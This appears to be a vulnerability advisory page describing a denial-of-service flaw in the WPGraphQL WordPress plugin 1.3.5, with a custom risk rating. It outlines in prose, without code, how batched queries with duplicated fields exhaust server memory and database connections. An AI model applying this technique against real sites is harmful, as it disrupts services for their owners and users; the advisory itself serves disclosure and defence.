Primary

Context

WPGraphQL Denial-of-Service Vulnerability

Vulnerability

A denial-of-service vulnerability has been identified in the WordPress plugin WPGraphQL, version 1.3.5. This vulnerability allows unauthenticated attackers to exhaust server resources by sending batched GraphQL queries that include duplicated fields. The exploitation of this vulnerability can lead to out-of-memory conditions on the server and MySQL connection errors.

Impact

Exploitation of this vulnerability causes severe resource exhaustion on the server, leading to out-of-memory conditions and MySQL connection errors.

Reproduction

The vulnerability can be reproduced by sending POST requests to the WordPress GraphQL endpoint with amplified field duplication payloads. This can be done using a Python script that batches queries with duplicated fields, effectively overwhelming the server's resources.

Added: May 15, 2026, 7:45 PM

Updated: May 15, 2026, 7:45 PM

Vulnerability Rating

Custom Algorithm

spread

5.2

impact

2.5

exploitability

9.7

remediation

0.0

relevance

8.4

threat

6.4

urgency

2.9

incentive

8.3

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

Vulnerability Rating

Custom Algorithm

spread

5.2

impact

2.5

exploitability

9.7

remediation

0.0

relevance

8.4

threat

6.4

urgency

2.9

incentive

8.3

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

WPGraphQL Denial-of-Service Vulnerability

Vulnerability

Impact

Reproduction

Affected Products

WPGraphQL

CVSS Scores

References

Vulnerability Rating

Vulnerability Rating